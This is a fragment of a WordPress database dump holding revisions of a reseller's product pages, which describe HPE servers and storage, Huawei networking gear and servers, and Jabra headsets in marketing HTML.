offices.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant ML350 Gen10 Server</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-ML350-Gen10-Server.png\" alt=\"\" width=\"232\" height=\"185\" /></p><p style=\"text-align: center;\">HPE ProLiant ML350 Gen10 server delivers a secure dual-socket tower server with performance, expandability, and proven reliability making it the choice for expanding SMBs, remote offices of larger businesses, and enterprise data centers.Â The shorter re-designed rackable chassis with multiple upgrade options provides flexibility that can expand as your business needs grow. It supports 12 Gb/s SAS, NVMe SSD, embedded 4x1GbE NIC with a broad range of graphics and compute options.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>HPE Synergy</strong></h2><p style=\"text-align: center;\">Composable, software-defined infrastructure that speeds application delivery.</p><h4 style=\"text-align: center;\"><strong>HPE Synergy 12000 Frame</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Synergy-12000-Frame.png\" alt=\"\" width=\"226\" height=\"170\" /></p><p style=\"text-align: center;\">HPE Synergy 12000 Frames are uniquely architected as Composable Infrastructure (CI) to match the powerful \'infrastructure-as-code\' capabilities of the HPE intelligent software architecture. Flexible access to compute, storage, and fabric resources allows for use and re-purposing. Linking multiple HPE Synergy Frames efficiently scales the infrastructure with a dedicated single view of the entire management network.</p><h4 style=\"text-align: center;\"><strong>HPE Synergy D3940 Storage Module</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Synergy-D3940-Storage-Module.png\" alt=\"\" width=\"222\" height=\"166\" /></p><p style=\"text-align: center;\">The HPE Synergy D3940 Storage Module provides a fluid pool of storage resources for the Composable Infrastructure. Additional capacity for compute modules is easily provisioned and intelligently managed with integrated data services for availability and protection. The 40 SFF drive bays per storage module can be populated with 12 G SAS or 6 G SATA drives. Expand up to 4 storage modules in a single Synergy 12000 Frame for a total of 200 drives.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>Data Storage</strong></h2><p style=\"text-align: center;\">Flash storage-integrated, built-for-the-cloud data protection that delivers unparalleled backup, archive and disaster recovery for your enterprise apps.</p><h4 style=\"text-align: center;\"><strong>HPE StoreOnce Systems</strong></h4><hr /><p style=\"text-align: center;\">Â <br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-StoreOnce-Systems.png\" alt=\"\" width=\"208\" height=\"156\" /></p><p style=\"text-align: center;\">HPE StoreOnce Systems with StoreOnce Catalyst provide a single, high-performance backup architecture that spans the entire enterprise. You can reduce the amount of backup data you need to store by 95% and choose between powerful dedicated appliances for larger offices and data centers, and flexible virtual appliances for smaller and remote offices. Industry leading backup and restore speeds mean that you can meet shrinking backup windows and recovery SLAs. StoreOnce Catalyst prevents exposure of backup copies to ransomware.</p><h4 style=\"text-align: center;\"><strong>HPE 3PAR StoreServ 8000 Storage</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-3PAR-StoreServ-8000-Storage.png\" alt=\"\" width=\"232\" height=\"166\" /></p><p style=\"text-align: center;\">HPE 3PAR StoreServ 8000 Storage, with the lowest all-flash starting price, delivers the performance advantages of a purpose-built, flash-optimized architecture without compromising resiliency, data services, or data mobility. Unlike other purpose-built flash arrays, 3PAR StoreServ 8000 doesnâ€™t require you to introduce an entirely new architecture to achieve flash-optimized performance. With unmatched versatility, performance, and density, HPE 3PAR StoreServ 8000 Storage has you covered with unified storage of block &amp; file protocols, application managed data protection and simplified fabric zoning along with SAN diagnostics.</p><h4 style=\"text-align: center;\"><strong>HPE 3PAR StoreServ 9000 Storage</strong></h4>\n<hr />\n&nbsp;\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-3PAR-StoreServ-9000-Storage.png\" alt=\"\" width=\"222\" height=\"171\" />\n<p style=\"text-align: center;\">HPE 3PAR StoreServ 9000 Storage helps you consolidate primary storage workloads â€“ for file and block -- onto an enterprise-class flash array without compromising performance, scalability, data services, or resiliency. This HPE 3PAR 9000 Storage is based on the proven HPE 3PAR architecture and is purpose built for all-flash consolidation, delivering the performance, simplicity and agility needed to support your hybrid IT environment. Whether your applications are virtualized, containerized, or traditional, the HPE 3PAR StoreServ 9000 Storage offers you a solution that can deliver improved business results.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2>NETWORKING</h2><h2 style=\"text-align: center;\"><strong>Router</strong></h2><p style=\"text-align: center;\">Navigate more devices and simplify complex networks with intelligent management of open standards routing.</p><h4 style=\"text-align: center;\"><strong>HPE FLexNetwork MSR95x Router Series</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-FLexNetwork-MSR95x-Router-Series.png\" alt=\"\" width=\"227\" height=\"171\" /></p><p style=\"text-align: center;\">HPE MSR95x Router Series delivers high-performance, small branch routing in a single, cost-optimized form factor. Featuring integrated routing, switching, wireless, security, and voice with no additional licensing, boost your service delivery while simplifying the management of the corporate WAN. This series is flexible to deploy, with Zero Touch Provisioning and WAN options with LTE connectivity. With Comware v7 and fiber connections, the MSR95x also brings the performance and advanced services available on modular routers, such as IPS and high encryption, to a fixed port form factor.</p><h4 style=\"text-align: center;\"><strong>Alcatel-Lucent 7750 Service Router Series</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Alcatel-Lucent-7750-Service-Router-Series.png\" alt=\"\" width=\"229\" height=\"171\" /></p><p style=\"text-align: center;\">The Alcatel-Lucent 7750 Service Router (SR) is a high-performance, multiservice, edge router designed for the concurrent support of advanced end user, business and mobile services on a common IP edge platform. Leveraging the Alcatel-Lucent in-house 400 Gb/s FP3 silicon technology, the 7750 SR enables a wide range of IP services for large enterprises and operators with exceptional performance, scale and service intelligence requirements. The 7750 SR utilizes the Alcatel-Lucent Service Router Operating System (SR OS) and supports service-aware management to enhance operational efficiency.</p><h4 style=\"text-align: center;\"><strong>HPE FlexNetwork MSR93x Router Series</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-FlexNetwork-MSR93x-Router-Series.png\" alt=\"\" width=\"232\" height=\"188\" /></p><p style=\"text-align: center;\">HPE MSR93x Router Series delivers a high-performance small-branch router providing integrated routing, switching, security, SIP, 802.11n WLAN connectivity, and 4G LTE/3G in a single unit. With its Converged Infrastructure, it enables faster time to service and enhanced performance while simplifying your network through a single management screen and zero-touch deployment. The MSR93x increases flexibility and agility, delivering extensive connectivity capabilities in a compact, fixed form factor. The MSR93x is based on open standards for seamless integration within small-branch deployment.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>Switches</strong></h2><h4 style=\"text-align: center;\"><strong>HPE Altoline 6921 48SFP+ 6QSFP+ x86 ONIE AC Back-to-Front Switch</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Altoline-6921-48SFP-6QSFP-x86-ONIE-AC-Back-to-Front-Switch.png\" alt=\"\" width=\"219\" height=\"165\" /></p><p style=\"text-align: center;\">The HPE Altoline 6921 Switch Series is an x86-based OCP certified, open-networking, disaggregated family of low-latency 10GbE data center switches in a 1U form factor. Perfect for deployment in web-scale environments as a 10GbE server access switch; optimized for data center hot/cold aisle deployments with reversible airflow. Hardware support for VXLAN is ideal for deployment in multi-tenancy and overlay environments.</p><h4 style=\"text-align: center;\"><strong>HPE Altoline 6960 32QSFP28 x86 ONIE AC Front-to-Back Switch</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Altoline-6960-32QSFP28-x86-ONIE-AC-Front-to-Back-Switch.png\" alt=\"\" width=\"244\" height=\"184\" /></p><p style=\"text-align: center;\">HPE Altoline 6960 Switch Series is an open-networking, disaggregated family of low latency 100/50/25GbE data center switches in a 1U form factor. Perfect for deployment in data center environments as 25GbE server access, or 100/50GbE spine switches. It is optimized for data center hot/cold aisle deployments with reversible airflow. The hardware support for VXLAN makes the Altoline 6960 ideal for deployment in multi-tenancy and overlay environments.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>&nbsp;\n&nbsp;\n<p style=\"text-align: center;\">To discover more, please click the button below or contact us to discuss your needs.</p>\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>','HPE','','inherit','closed','closed','','1529-revision-v1','','','2019-10-01 17:39:29','2019-10-01 09:39:29','',1529,'https://bintara.com.my/blog/2019/10/01/1529-revision-v1/',0,'revision','',0),(3641,1,'2019-10-02 15:54:44','2019-10-02 07:54:44','<h2>Enterprise Wireless</h2><h4>Intelligent Wireless Connections, Building Digital Industries</h4><h3 style=\"text-align: center;\"><strong>What Are the Benefits of the Enterprise Wireless?</strong></h3><ul><li>Multiple Services on One Network</li><li>Industrial-Grade Reliability</li><li>Access Anytime and Anywhere</li></ul><p style=\"text-align: left;\">Huawei uses leading 4.5G wireless technologies and its in-depth understanding of industry customers to provide the eLTE Multimedia Critical Communications System (MCCS) Solution, the 4.5G-based eLTE narrowband and broadband integrated wireless IoT solution, and the GSM-R solution for a wide range of services, such as narrowband, broadband, voice, multimedia, fixed, and mobile. Huawei also builds a professional and reliable mobile communications platform for diverse industry applications, such as professional trunking voice, wireless video surveillance, broadband data access, mass data collection, railway wireless dispatching, and high-speed train control.</p><h2 style=\"text-align: center;\">Enterprise Routers</h2><p style=\"text-align: center;\">Routers with large-capacity, high-reliability, easy O&amp;M, and low power consumption help enterprises in various industries to quickly achieve digital transformation.</p><h3 style=\"text-align: center;\">NE Series Routers</h3><p>Highest performance routers to power innovative enterprise applications from small to super huge scale. Carrier-grade reliability, flexible modular architecture, and energy-efficient technologies add up to great service at lowest TCO.</p><h3 style=\"text-align: center;\">ME60 Series</h3><p>2T hardware platform, providing 10G to 480G line cards (including 160G CGN line cards), supporting a maximum of 256K concurrent users and allowing 1,200 users to go online per second.</p><h3 style=\"text-align: center;\">PTN 7900 Series</h3><p>The OptiX PTN 7900 NE is a new-generation high-capacity, high-bandwidth, and software-defined core device that supports smart services.</p><h3 style=\"text-align: center;\">AR502 Series IoT Gateways</h3><p>The AR502 uses the built-in industrial-grade LTE module, and offers high bandwidth and low-latency wireless access. It provides various local interfaces and applies to a number of IoT fields, such as smart grid, smart city, and smart building.</p><h3 style=\"text-align: center;\">AR1200 Series Enterprise Routers</h3><p>The AR1200 is a multi-service router designed for Small and Medium-sized Enterprises (SMEs). It provides Internet access, dedicated line access, and voice, security, and wireless functions. It can be deployed at the egress of small and medium-sized campus networks and the headquarters and branches of SMEs.</p>		\n			<h2>Why Huawei Routers?</h2>		\n		<h3 style=\"text-align: center;\"><strong>Leading Market Share</strong></h3><p>Huawei routers ranked No. 1 in China and No. 2 in the global market, and 70% of carriers and enterprise network NAs use them.</p><h3 style=\"text-align: center;\"><strong>Strong Development Capabilities</strong></h3><p>Huawei is a leader and outstanding contributor in the IP standards field. Its proprietary Solar chipset had large-scale commercial use on the live network in 2013 and more than 3 million chips were delivered, and the Huawei-proprietary VRP software is the culmination of 17 years of innovation.</p><h3 style=\"text-align: center;\"><strong>Award Winning Products</strong></h3><p>Huawei routers have won multiple international awards, including SDN-VDC InfoVision award and Japanâ€™s Interop gold award, and they have obtained certification from multiple third-party authoritative organizations worldwide.</p>		\n		<h2 style=\"text-align: center;\">Switches</h2>For a wide variety of applications and networkÂ sizes, fromÂ cloud data centers to campus networks<h3 style=\"text-align: center;\"><strong>Campus Switches</strong></h3><p>Huaweiâ€™s self-developed, innovative data center, campus, and carrier switch portfolios help accelerate your digital transformation.</p><h3 style=\"text-align: center;\"><strong>Data Center Switches</strong></h3><p>CloudEngine series switches offer carrier-grade reliability, virtualization support, iStack clustering, and Software-Defined Networking features for building and scaling data centers and campus networks. They provide versatility and resilient performance for server-based multimedia applications, Big Data analytics, and cloud computing.</p>		\n			<h2>Why Huawei Switches?</h2>		\n		<h3 style=\"text-align: center;\"><strong>Diversified Products and Solutions</strong></h3><p>Huawei provides the most complete portfolio of data center network and campus products, supporting customers business requirements for digital transformation and enabling their rapid growth of virtualization, Big Data, and cloud services.</p><h3 style=\"text-align: center;\"><strong>Extensive Customer Cases</strong></h3><p>Huawei switches have been deployed for enterprises in more than 150 countries and are widely used in sectors such as finance, Internet, retail, education, manufacturing, and public services. Huaweiâ€™s data center network and wired and wireless convergence solutions are rated as Challenger and Visionary in Gartnerâ€™s Magic Quadrant, respectively.</p><h3 style=\"text-align: center;\"><strong>Many Global Channels and Localized Services</strong></h3><p>Huawei switches support tens of thousands of channels and partners in 150 countries, providing innovative switch solutions in all industries and localized services.</p>		\n		<h2 style=\"text-align: center;\">Servers - Intelligent Computing</h2><p style=\"text-align: center;\">Boundless Computing Inspires an Intelligent Digital World.</p><h3 style=\"text-align: center;\"><strong>FusionServer 2488H V5 Rack Server</strong></h3><p>The FusionServer 2488H V5 is Huaweiâ€™s latest 2U 4-socket rack server. It is ideal for compute-intensive scenarios such as virtualization, High-Performance Computing (HPC), database, and SAP HANA.</p><h3 style=\"text-align: center;\"><strong>TaiShan 2280 ARM Server</strong></h3><p>A 2U, 2-socket rack server powered by Huawei 64-bit ARMv8 Hi1616 processors that provides high performance with low power consumption.</p><h3 style=\"text-align: center;\"><strong>FusionServer G5500 Data Center Heterogeneous Server</strong></h3><p>FusionServer G5500 is a heterogeneous server positioned for data center deployment. It offers the best-in-class heterogeneous computing platform for scenarios such as Artificial Intelligence (AI), HPC, intelligent cloud, video analytics, and database acceleration.</p><h3 style=\"text-align: center;\"><strong>Huawei FusionCube HCI</strong></h3><p>Huawei FusionCube HCI (Hyper-Converged Infrastructure) is an IT platform based on a hyper-converged architecture. It complies with open architecture standards, converges compute and storage, and pre-integrates distributed storage engines, virtualization, and cloud management software, allowing for resource-on-demand provisioning and linear expansion.FusionCube HCI supports various hardware form factors including blade, high-density, and rack, meeting the flexible configuration requirements of different services for compute, storage, and I/O resources. The FusionCube HCI applies to cloud computing scenarios and is an ideal choice for deploying the IT infrastructure of cloud data centers.</p><h3 style=\"text-align: center;\"><strong>KunLun Mission Critical Server</strong></h3><p>KunLun is designed for mission-critical workloads and is ideal for core databases, database application consolidation, in-memory computing, High-Performance Computing (HPC) fat nodes, and more scenarios. With innovative RAS 2.0 technology, the server offers an open x86 ecosystem with the reliability of UNIX servers, helping customers move from closed to open architecture and unlock innovation potential.</p><h3 style=\"text-align: center;\"><strong>FX-Series FPGA Accelerator Cards</strong></h3>These accelerator cards provide high-performance compute power and high-bandwidth data connections, making them ideal for hardware-accelerated services.		\n			<h2>Why Huawei Servers?</h2>		\n		<h3 style=\"text-align: center;\"><strong>Efficient and Reliable</strong></h3><p>To ensure that we meet customer requirements for servers, Huawei implements stringent quality control across eight processes, including product planning, R&amp;D, supply chain management, and post-sales service. Before delivery, each product has undergone more than 2,000 hardware tests, 10,000 software tests, and 300 entry certifications.</p><h3 style=\"text-align: center;\"><strong>Continuous Innovation</strong></h3><p>Huaweiâ€™s Boundless Computing strategy accelerates innovation at the chip level across computing, storage, and networking technologies, moving enterprise intelligence toward a better-connected, smart world. Huawei has focused its years of R&amp;D development efforts by setting up global OpenLabs to collaborate with top partners.</p><h3 style=\"text-align: center;\"><strong>Trustworthy</strong></h3><p>Huawei successfully cooperates with customers and technology partners, striving to provide open computing infrastructure that supports optimal customer and partner outcomes. With solid reliability, excellent performance, and easy integration, Huawei servers are used by more than 5,000 customers worldwide in more than 25 sectors.</p>[maxbutton id=\"1\" ]','Huawei','','inherit','closed','closed','','1534-revision-v1','','','2019-10-02 15:54:44','2019-10-02 07:54:44','',1534,'https://bintara.com.my/blog/2019/10/02/1534-revision-v1/',0,'revision','',0),(3648,1,'2019-10-03 15:32:14','2019-10-03 07:32:14','<h1 style=\"text-align: center;\"><strong>Jabra</strong></h1><h3 style=\"text-align: center;\">Sound thatâ€™s engineered for you</h3><p>We engineer true wireless earbuds offering you total freedom noise-cancelling headsets allowing you to block out unwanted background sound; high definition headsets letting those youâ€™re speaking to hear you with crystal-clear clarity and state-of-the-art fitness tracking sports headphones that aid you in beating your personal best. Each product helps you hear more, do more, and be more.</p><p>With Jabra, you know that you are getting the best products on the market. They are engineered to be so.</p><h2>Jabra Evolve Series</h2><h3>Engineered to be the best professional headsets to enhance productivity in the open office</h3>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve-300x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve-300x300.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/Evolve-150x150.jpg 150w, https://bintara.com.my/wp-content/uploads/2019/02/Evolve-20x20.jpg 20w, https://bintara.com.my/wp-content/uploads/2019/02/Evolve.jpg 585w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h3>Better concentration, greater productivity</h3><p>The Jabra Evolve Series is a professional range of headsets offering best-in-class noise cancellation to aid concentration in open office environments.</p><ul><li>World-class speakers to deliver amazing sound for calls and music.</li><li>Call-management features allow for incredible ease-of-use..</li><li>Compatible with all leading UC platforms.</li></ul>		\n		<h2 style=\"text-align: center;\"><strong>Jabra Evolve 65t</strong></h2><p>The Jabra Evolve 65t are the worldâ€™s first UC-certified, true wireless earbuds. Features include Bluetooth 5.0, Passive Noise Cancellation, long battery life (up to 15 hours), and multiple EarGelsâ„¢ for a personalized, secure fit. Enjoy crystal-clear sound quality and rock-solid call and music connection.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/JabraEvolve65t_ProductImage.png\" alt=\"\" width=\"163\" height=\"163\" /></p><p>Â </p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_80.png\" alt=\"\" width=\"203\" height=\"203\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 80</strong></h2><p>Engineered for concentration, Evolve 80 is a corded premium headset for professionals who need to avoid disruptive noise. Superior Active and Passive Noise Cancellation provide crystal-clear calls. All-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 75e</strong></h2><p>Engineered for professional sound in comfortable, wireless earbuds, Evolve 75e is for those who need Skype for Business and Active Noise Cancellation â€“ but in an around-the-neck design. A host of professional features found in the Jabra Evolve Series, combined with up to 14 hours of battery for calls and music.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Evolve75e.png\" alt=\"\" width=\"205\" height=\"205\" /></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/954a74d741e4aeb8f7a9bd04d9dd2b0643c89424_00_Evolve_75.png\" alt=\"\" width=\"201\" height=\"201\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 75</strong></h2><p>Engineered for concentration in the office, Evolve 75 is a wireless premium headset for professionals who want to avoid disruptive noise â€“ and need mobility around the workspace. Move up to 100ft/30m away from your connected device, all-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 65 Stereo / Mono</strong></h2><p>Engineered to multi-task, Evolve 65 is a wireless headset ideal for professionals who move around the office, but need to avoid interruptions. Connects to two Bluetooth products, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_65.png\" alt=\"\" width=\"203\" height=\"203\" /></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/752b1c6ecb4d653451bc19b4b566a870ae6bd94f_00_Evolve_40.png\" alt=\"\" width=\"209\" height=\"209\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 40 Stereo / Mono</strong></h2><p>Engineered to boost productivity, Evolve 40 is a corded headset for professionals who take calls at the desk and need to avoid interruptions. Connects using USB or jack, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 30 Stereo / Mono</strong></h2><p>Engineered for flexible connectivity, Evolve 30 is a corded headset for professionals who want simple and fast Plug and Play connection to USB or jack. Features a control unit for easy call management, and is certified for Skype for Business, Cisco, and more. Comes with leather-feel ear cushions and on-the-ear design for all-day use.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20.png\" alt=\"\" width=\"200\" height=\"200\" /></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20.png\" alt=\"\" width=\"216\" height=\"216\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 20 Stereo / Mono</strong></h2><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 20 SE</strong></h2><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20_SE_Mono.png\" alt=\"\" width=\"204\" height=\"204\" /></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Engage_50_3.png\" alt=\"\" width=\"219\" height=\"249\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Engage 50</strong></h2><p>Is your contact center moving, or considering moving, to softphones? Are you investing in contact center platform â€“ whether on-premise or cloud-based? The Jabra Engage 50 is the ideal digital headset to power your customer satisfaction.</p><p>The Jabra Engage 50 features a powerful processing chip in the earcup that delivers advanced functionality including call analytic data.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p>		\n		<h2><strong>Jabra Biz Wired Series</strong></h2><h3>The Jabra Biz has an extremely lightweight and unobtrusive design.</h3><h2 style=\"text-align: center;\"><strong>Jabra Biz 2400 II</strong></h2><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Biz_2400_II.png\" alt=\"\" width=\"179\" height=\"179\" /></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/jabra_biz_2400_ii_mono_3-in-1.jpg\" alt=\"\" width=\"195\" height=\"195\" /></p><h2 style=\"text-align: center;\">Jabra BIZ 2400 II Mono 3-in-1</h2><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><h2 style=\"text-align: center;\"><strong>Jabra Biz 2400 II DUO</strong></h2><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Biz_2400_II.png\" alt=\"\" width=\"188\" height=\"188\" /></p>https://youtu.be/85RJqPjfjng		\n		<p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_2300_QD_Duo.png\" alt=\"\" width=\"197\" height=\"197\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Biz 2300</strong></h2><p>Built to survive in a high-performing contact centre, meaning fewer headset replacements and less downtime for you and your team and lower total cost of ownership.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><h2 style=\"text-align: center;\"><strong>Jabra Biz 2300 QD</strong></h2><p>Jabra Bizâ„¢ 2300 QD Mono is a mono headset with QD (Quick Disconnect) plug that provides instant connectivity to a wide range of desk phone systems.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_2300_QD.png\" alt=\"\" width=\"186\" height=\"186\" /></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_2300_QD_Duo.png\" alt=\"\" width=\"188\" height=\"188\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Biz 2300 QD DUO</strong></h2><p>Jabra Bizâ„¢ 2300 QD Duo is a duo headset with QD (Quick Disconnect) plug that provides instant connectivity to a wide range of desk phone systems.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><h2 style=\"text-align: center;\"><strong>Jabra Biz 1500</strong></h2><p>The Jabra BIZ 1500 is an entry level, low cost professional corded headset built for cost conscious contact centers. With noise cancellation technology, background noise is reduced providing a more professional customer experience on every call.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_1500_DUO_QD.png\" alt=\"\" width=\"197\" height=\"197\" /></p><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_1500_DUO_USB.png\" alt=\"\" width=\"190\" height=\"190\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Biz 1500 DUO USB</strong></h2><p>Cost Efficient Professional Corded Headset for Softphone.A duo headset that provides USB connectivity to laptops for softphone use. Comes with a control unit for easy control of volume and mute when on a call.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>','Jabra','','inherit','closed','closed','','1532-revision-v1','','','2019-10-03 15:32:14','2019-10-03 07:32:14','',1532,'https://bintara.com.my/blog/2019/10/03/1532-revision-v1/',0,'revision','',0),(3650,1,'2019-10-03 15:39:54','2019-10-03 07:39:54','<h1 style=\"text-align: center;\"><strong>Jabra</strong></h1><h3 style=\"text-align: center;\">Sound thatâ€™s engineered for you</h3><p>We engineer true wireless earbuds offering you total freedom noise-cancelling headsets allowing you to block out unwanted background sound; high definition headsets letting those youâ€™re speaking to hear you with crystal-clear clarity and state-of-the-art fitness tracking sports headphones that aid you in beating your personal best. Each product helps you hear more, do more, and be more.</p><p>With Jabra, you know that you are getting the best products on the market. They are engineered to be so.</p><h2>Jabra Evolve Series</h2><h3>Engineered to be the best professional headsets to enhance productivity in the open office</h3>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve-300x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve-300x300.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/Evolve-150x150.jpg 150w, https://bintara.com.my/wp-content/uploads/2019/02/Evolve-20x20.jpg 20w, https://bintara.com.my/wp-content/uploads/2019/02/Evolve.jpg 585w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h3>Better concentration, greater productivity</h3><p>The Jabra Evolve Series is a professional range of headsets offering best-in-class noise cancellation to aid concentration in open office environments.</p><ul><li>World-class speakers to deliver amazing sound for calls and music.</li><li>Call-management features allow for incredible ease-of-use..</li><li>Compatible with all leading UC platforms.</li></ul>		\n		<h2 style=\"text-align: center;\"><strong>Jabra Evolve 65t</strong></h2><p>The Jabra Evolve 65t are the worldâ€™s first UC-certified, true wireless earbuds. Features include Bluetooth 5.0, Passive Noise Cancellation, long battery life (up to 15 hours), and multiple EarGelsâ„¢ for a personalized, secure fit. Enjoy crystal-clear sound quality and rock-solid call and music connection.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/JabraEvolve65t_ProductImage.png\" alt=\"\" width=\"163\" height=\"163\" /></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_80.png\" alt=\"\" width=\"203\" height=\"203\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 80</strong></h2><p>Engineered for concentration, Evolve 80 is a corded premium headset for professionals who need to avoid disruptive 